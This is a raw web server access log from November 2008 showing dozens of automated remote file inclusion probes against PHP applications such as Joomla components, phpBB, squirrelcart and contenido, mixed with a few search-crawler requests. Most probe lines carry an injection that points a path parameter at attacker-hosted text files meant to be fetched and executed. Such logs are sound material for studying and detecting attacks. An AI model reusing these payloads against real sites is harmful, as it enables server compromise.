195.239.48.166 - - [03/Nov/2008:08:30:49 -0600] "GET //joomla/index.php?option=com_restaurante&task=http://www.hb4y.net/autopligger/er.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
211.247.226.253 - - [03/Nov/2008:08:30:58 -0600] "GET /logs/access_log.1214179200//ktmlpro/includes/ktedit/errors.php?error=http://www.dindondago.it/l333tbi1tX.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
211.247.226.253 - - [03/Nov/2008:08:30:58 -0600] "GET /logs//ktmlpro/includes/ktedit/errors.php?error=http://www.dindondago.it/l333tbi1tX.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
211.247.226.253 - - [03/Nov/2008:08:31:02 -0600] "GET //ktmlpro/includes/ktedit/errors.php?error=http://www.dindondago.it/l333tbi1tX.txt???? HTTP/1.1" 404 319 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
83.149.69.97 - - [03/Nov/2008:08:31:09 -0600] "GET /logs/access_log.1215302400/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 350 "-""libwww-perl/5.79"
66.197.201.69 - - [03/Nov/2008:08:31:23 -0600] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.desividesimasti.net/forums/games/includes/images/id.txt?%0D?? HTTP/1.1" 404 336 "-""libwww-perl/5.65"
66.197.201.69 - - [03/Nov/2008:08:31:23 -0600] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.desividesimasti.net/forums/games/includes/images/id.txt?%0D?? HTTP/1.1" 404 331 "-""libwww-perl/5.65"
83.149.69.97 - - [03/Nov/2008:08:31:55 -0600] "GET /logs/access_log.1206144000%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 351 "-""libwww-perl/5.79"
65.55.208.125 - - [03/Nov/2008:08:32:33 -0600] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.125 - - [03/Nov/2008:08:32:33 -0600] "GET /logs/access_log.1213488000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.125 - - [03/Nov/2008:08:32:34 -0600] "GET /logs/access_log.1207180800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
140.130.101.5 - - [03/Nov/2008:08:32:53 -0600] "GET /logs/access_log.1210291200//?path%5Bdocroot%5D=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
213.251.154.174 - - [03/Nov/2008:08:33:12 -0600] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.kampeermarkt.com/banner/idv6.txt???? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
213.251.154.174 - - [03/Nov/2008:08:33:12 -0600] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.kampeermarkt.com/banner/idv6.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
140.130.101.5 - - [03/Nov/2008:08:33:20 -0600] "GET /logs/access_log.1212278400//?path%5Bdocroot%5D=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
83.149.69.97 - - [03/Nov/2008:08:33:26 -0600] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.phdcursos.com.br/http/idd.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
83.149.69.97 - - [03/Nov/2008:08:33:26 -0600] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.phdcursos.com.br/http/idd.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
83.149.69.97 - - [03/Nov/2008:08:33:26 -0600] "GET /logs/access_log.1206144000/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.phdcursos.com.br/http/idd.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
216.55.140.43 - - [03/Nov/2008:08:34:42 -0600] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.69"
216.55.140.43 - - [03/Nov/2008:08:34:42 -0600] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.69"
211.223.228.3 - - [03/Nov/2008:08:35:11 -0600] "GET //sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://severin.clan.su/tom/test.txt?? HTTP/1.1" 404 301 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
211.223.228.3 - - [03/Nov/2008:08:35:11 -0600] "GET /logs//sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://severin.clan.su/tom/test.txt?? HTTP/1.1" 404 306 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
216.55.140.43 - - [03/Nov/2008:08:36:14 -0600] "GET //components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.69"
216.55.140.43 - - [03/Nov/2008:08:36:14 -0600] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.69"
216.55.140.43 - - [03/Nov/2008:08:36:14 -0600] "GET //components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.69"
140.130.101.5 - - [03/Nov/2008:08:38:57 -0600] "GET /logs/access_log.1216598400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
140.130.101.5 - - [03/Nov/2008:08:38:57 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
140.130.101.5 - - [03/Nov/2008:08:38:57 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
140.130.101.5 - - [03/Nov/2008:08:38:57 -0600] "GET /logs/access_log.1217462400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
216.65.1.253 - - [03/Nov/2008:08:40:09 -0600] "GET /logs/access_log.1211587200//components/com_rwcards/captcha/captcha_image.php?mosConfig_absolute_path=http://www.shefaa.org/images/id?? HTTP/1.1" 404 360 "-""libwww-perl/5.803"
216.65.1.253 - - [03/Nov/2008:08:40:09 -0600] "GET //components/com_rwcards/captcha/captcha_image.php?mosConfig_absolute_path=http://www.shefaa.org/images/id?? HTTP/1.1" 404 333 "-""libwww-perl/5.803"
216.65.1.253 - - [03/Nov/2008:08:40:10 -0600] "GET /logs//components/com_rwcards/captcha/captcha_image.php?mosConfig_absolute_path=http://www.shefaa.org/images/id?? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
194.186.47.24 - - [03/Nov/2008:08:44:07 -0600] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.parkliv.nu/mambots/%20%20%20/.t/id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
195.16.62.74 - - [03/Nov/2008:08:44:07 -0600] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.parkliv.nu/mambots/%20%20%20/.t/id.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
59.125.183.76 - - [03/Nov/2008:08:45:53 -0600] "GET /logs/access_log.1206230400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 365 "-""libwww-perl/5.79"
59.125.183.76 - - [03/Nov/2008:08:45:53 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
59.125.183.76 - - [03/Nov/2008:08:45:54 -0600] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
66.197.201.69 - - [03/Nov/2008:08:45:58 -0600] "GET /logs/access_log.1208304000///squirrelcart/cart_content.php?cart_isp_root=http://www.desividesimasti.net/forums/games/includes/images/id.txt?%0D?? HTTP/1.1" 404 342 "-""libwww-perl/5.65"
66.197.201.69 - - [03/Nov/2008:08:45:58 -0600] "GET ///squirrelcart/cart_content.php?cart_isp_root=http://www.desividesimasti.net/forums/games/includes/images/id.txt?%0D?? HTTP/1.1" 404 315 "-""libwww-perl/5.65"
66.197.201.69 - - [03/Nov/2008:08:45:58 -0600] "GET /logs///squirrelcart/cart_content.php?cart_isp_root=http://www.desividesimasti.net/forums/games/includes/images/id.txt?%0D?? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
203.86.233.109 - - [03/Nov/2008:08:46:00 -0600] "GET /logs/access_log.1215302400/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tortuga-finance.com/includes/.../on.txt?? HTTP/1.1" 404 377 "-""libwww-perl/5.803"
74.6.18.228 - - [03/Nov/2008:08:46:11 -0600] "GET /costume/thmb5.htm HTTP/1.0" 200 2921 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
66.197.201.69 - - [03/Nov/2008:08:46:15 -0600] "GET /logs/access_log.1208044800///squirrelcart/cart_content.php?cart_isp_root=http://www.desividesimasti.net/forums/games/includes/images/id.txt?%0D?? HTTP/1.1" 404 342 "-""libwww-perl/5.65"
70.85.192.194 - - [03/Nov/2008:08:46:23 -0600] "GET /logs/access_log.1211414400//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.jedrzejow.pl/file_01/idfeel.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
70.85.192.194 - - [03/Nov/2008:08:46:23 -0600] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.jedrzejow.pl/file_01/idfeel.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
70.85.192.194 - - [03/Nov/2008:08:46:23 -0600] "GET /logs/access_log.1211760000//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.jedrzejow.pl/file_01/idfeel.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
70.85.192.194 - - [03/Nov/2008:08:46:23 -0600] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.jedrzejow.pl/file_01/idfeel.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
207.150.183.60 - - [03/Nov/2008:08:46:54 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/kamtiez_family2000/kontol.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
207.150.183.60 - - [03/Nov/2008:08:46:54 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/kamtiez_family2000/kontol.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
207.150.183.60 - - [03/Nov/2008:08:46:55 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/kamtiez_family2000/kontol.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
207.150.183.60 - - [03/Nov/2008:08:46:55 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/kamtiez_family2000/kontol.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
207.150.183.60 - - [03/Nov/2008:08:47:15 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
207.150.183.60 - - [03/Nov/2008:08:47:15 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
195.12.53.176 - - [03/Nov/2008:08:48:36 -0600] "GET /?sourcedir=http://www.contactosteune.com/poll/osid6.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
195.12.53.176 - - [03/Nov/2008:08:48:37 -0600] "GET /logs/?sourcedir=http://www.contactosteune.com/poll/osid6.txt?? HTTP/1.1" 200 105501 "-""libwww-perl/5.805"
66.40.52.30 - - [03/Nov/2008:08:50:17 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.800"
66.40.52.30 - - [03/Nov/2008:08:50:23 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.800"
70.85.192.194 - - [03/Nov/2008:08:51:43 -0600] "GET /logs/access_log.1216339200/index.php?link=http://www.jedrzejow.pl/file_01/idfeel.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
70.85.192.194 - - [03/Nov/2008:08:51:43 -0600] "GET /logs/index.php?link=http://www.jedrzejow.pl/file_01/idfeel.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
70.85.192.194 - - [03/Nov/2008:08:51:43 -0600] "GET /index.php?link=http://www.jedrzejow.pl/file_01/idfeel.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
70.85.192.194 - - [03/Nov/2008:08:51:43 -0600] "GET /logs/access_log.1215993600/index.php?link=http://www.jedrzejow.pl/file_01/idfeel.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
69.64.78.34 - - [03/Nov/2008:08:52:15 -0600] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.parkliv.nu/mambots/%20%20%20/.t/id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
69.64.78.34 - - [03/Nov/2008:08:52:20 -0600] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.parkliv.nu/mambots/%20%20%20/.t/id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
216.127.66.127 - - [03/Nov/2008:08:52:32 -0600] "GET /logs/index.php?link=http://www.jedrzejow.pl/file_01/idfeel.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
216.127.66.127 - - [03/Nov/2008:08:52:45 -0600] "GET /logs/access_log.1215993600/index.php?link=http://www.jedrzejow.pl/file_01/idfeel.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
69.64.78.34 - - [03/Nov/2008:08:52:50 -0600] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.parkliv.nu/mambots/%20%20%20/.t/id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
66.40.52.30 - - [03/Nov/2008:08:52:50 -0600] "GET /logs//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 346 "-""libwww-perl/5.800"
66.40.52.30 - - [03/Nov/2008:08:52:50 -0600] "GET //browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.800"
216.127.66.127 - - [03/Nov/2008:08:52:53 -0600] "GET /index.php?link=http://www.jedrzejow.pl/file_01/idfeel.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
69.64.78.34 - - [03/Nov/2008:08:52:56 -0600] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.parkliv.nu/mambots/%20%20%20/.t/id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
88.84.145.169 - - [03/Nov/2008:08:53:16 -0600] "GET /logs//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 346 "-""libwww-perl/5.803"
88.84.145.169 - - [03/Nov/2008:08:53:27 -0600] "GET //browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 341 "-""libwww-perl/5.803"
200.85.32.31 - - [03/Nov/2008:08:53:38 -0600] "GET /logs/access_log.1216684800//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.tongso.com/tongso/copyright.txt??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
200.85.32.31 - - [03/Nov/2008:08:53:38 -0600] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.tongso.com/tongso/copyright.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
200.85.32.31 - - [03/Nov/2008:08:53:38 -0600] "GET /logs/access_log.1218672000//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.tongso.com/tongso/copyright.txt??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
70.38.12.204 - - [03/Nov/2008:08:54:04 -0600] "GET /logs/include/bbs.lib.inc.php?site_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
70.38.12.204 - - [03/Nov/2008:08:54:04 -0600] "GET /include/bbs.lib.inc.php?site_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
216.127.66.127 - - [03/Nov/2008:08:54:31 -0600] "GET /logs/access_log.1216339200/index.php?link=http://www.jedrzejow.pl/file_01/idfeel.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
203.83.219.27 - - [03/Nov/2008:08:55:25 -0600] "GET /logs/modules/agendax/addevent.inc.phphttp://www.tortuga-finance.com/includes/.../on.txt?? HTTP/1.1" 404 371 "-""libwww-perl/5.812"
80.190.202.150 - - [03/Nov/2008:08:55:25 -0600] "GET /logs/access_log.1211155200//includes/get_header.php?vwar_root=http://vidinas.net/tmp/images/id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
80.190.202.150 - - [03/Nov/2008:08:55:26 -0600] "GET //includes/get_header.php?vwar_root=http://vidinas.net/tmp/images/id.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
203.83.219.27 - - [03/Nov/2008:08:55:26 -0600] "GET /modules/agendax/addevent.inc.phphttp://www.tortuga-finance.com/includes/.../on.txt?? HTTP/1.1" 404 366 "-""libwww-perl/5.812"
80.190.202.150 - - [03/Nov/2008:08:55:26 -0600] "GET /logs//includes/get_header.php?vwar_root=http://vidinas.net/tmp/images/id.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
77.104.245.71 - - [03/Nov/2008:08:56:32 -0600] "GET /logs/access_log.1214179200//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.shefaa.org/images/id?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
77.104.245.71 - - [03/Nov/2008:08:56:32 -0600] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.shefaa.org/images/id?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
77.104.245.71 - - [03/Nov/2008:08:56:32 -0600] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.shefaa.org/images/id?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
77.104.245.71 - - [03/Nov/2008:08:56:33 -0600] "GET /logs/access_log.1214524800//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.shefaa.org/images/id?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
216.139.67.116 - - [03/Nov/2008:08:56:53 -0600] "GET /logs//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 346 "-""libwww-perl/5.64"
216.139.67.116 - - [03/Nov/2008:08:56:53 -0600] "GET //browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 341 "-""libwww-perl/5.64"
203.83.219.27 - - [03/Nov/2008:08:57:42 -0600] "GET /logs/modules/agendax/addevent.inc.phphttp://www.tortuga-finance.com/includes/.../on.txt?? HTTP/1.1" 404 371 "-""libwww-perl/5.812"
203.83.219.27 - - [03/Nov/2008:08:57:43 -0600] "GET /modules/agendax/addevent.inc.phphttp://www.tortuga-finance.com/includes/.../on.txt?? HTTP/1.1" 404 366 "-""libwww-perl/5.812"
59.125.96.13 - - [03/Nov/2008:08:58:02 -0600] "GET /logs//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://maurinho.t35.com/idr0x.txt??? HTTP/1.1" 404 346 "-""libwww-perl/5.79"
59.125.96.13 - - [03/Nov/2008:08:58:03 -0600] "GET //browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://maurinho.t35.com/idr0x.txt??? HTTP/1.1" 404 341 "-""libwww-perl/5.79"
203.83.219.27 - - [03/Nov/2008:08:58:09 -0600] "GET /logs/modules/agendax/addevent.inc.php?agendax_path=http://www.tortuga-finance.com/includes/.../on.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.812"
203.83.219.27 - - [03/Nov/2008:08:58:10 -0600] "GET /modules/agendax/addevent.inc.php?agendax_path=http://www.tortuga-finance.com/includes/.../on.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.812"
66.40.52.30 - - [03/Nov/2008:09:00:07 -0600] "GET /logs/access_log.1205366400/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.800"
66.40.52.30 - - [03/Nov/2008:09:00:07 -0600] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.800"
66.40.52.30 - - [03/Nov/2008:09:00:07 -0600] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.800"
70.38.38.231 - - [03/Nov/2008:09:00:58 -0600] "GET /logs/include/bbs.lib.inc.php?site_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 312 "-""libwww-perl/5.814"
70.38.38.231 - - [03/Nov/2008:09:00:59 -0600] "GET /include/bbs.lib.inc.php?site_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 307 "-""libwww-perl/5.814"
213.165.84.215 - - [03/Nov/2008:09:01:51 -0600] "GET /logs/include/bbs.lib.inc.php?site_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
213.165.84.215 - - [03/Nov/2008:09:01:52 -0600] "GET /include/bbs.lib.inc.php?site_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
70.38.38.231 - - [03/Nov/2008:09:02:07 -0600] "GET /logs/include/bbs.lib.inc.php?site_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 312 "-""libwww-perl/5.814"
70.38.38.231 - - [03/Nov/2008:09:02:07 -0600] "GET /include/bbs.lib.inc.php?site_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 307 "-""libwww-perl/5.814"
202.144.158.163 - - [03/Nov/2008:09:02:57 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
202.144.158.163 - - [03/Nov/2008:09:02:57 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
74.6.18.228 - - [03/Nov/2008:09:03:06 -0600] "GET /logs/access_log.1200009600 HTTP/1.0" 200 249080 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
213.165.84.215 - - [03/Nov/2008:09:03:10 -0600] "GET /logs/include/bbs.lib.inc.php?site_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
213.165.84.215 - - [03/Nov/2008:09:03:10 -0600] "GET /include/bbs.lib.inc.php?site_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
69.64.78.34 - - [03/Nov/2008:09:03:28 -0600] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.parkliv.nu/mambots/%20%20%20/.t/id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
69.64.78.34 - - [03/Nov/2008:09:03:31 -0600] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.parkliv.nu/mambots/%20%20%20/.t/id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
62.87.154.41 - - [03/Nov/2008:09:03:50 -0600] "GET //?path%5Bdocroot%5D=http://geocities.com/d.imud/header.jpg? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
208.83.106.201 - - [03/Nov/2008:09:03:55 -0600] "GET /logs/access_log.1219536000//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
208.83.106.201 - - [03/Nov/2008:09:03:55 -0600] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
208.83.106.201 - - [03/Nov/2008:09:03:58 -0600] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
208.83.106.201 - - [03/Nov/2008:09:03:58 -0600] "GET /logs/access_log.1217203200//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
64.246.187.54 - - [03/Nov/2008:09:04:04 -0600] "GET /logs/include/bbs.lib.inc.php?site_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
64.246.187.54 - - [03/Nov/2008:09:04:04 -0600] "GET /include/bbs.lib.inc.php?site_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
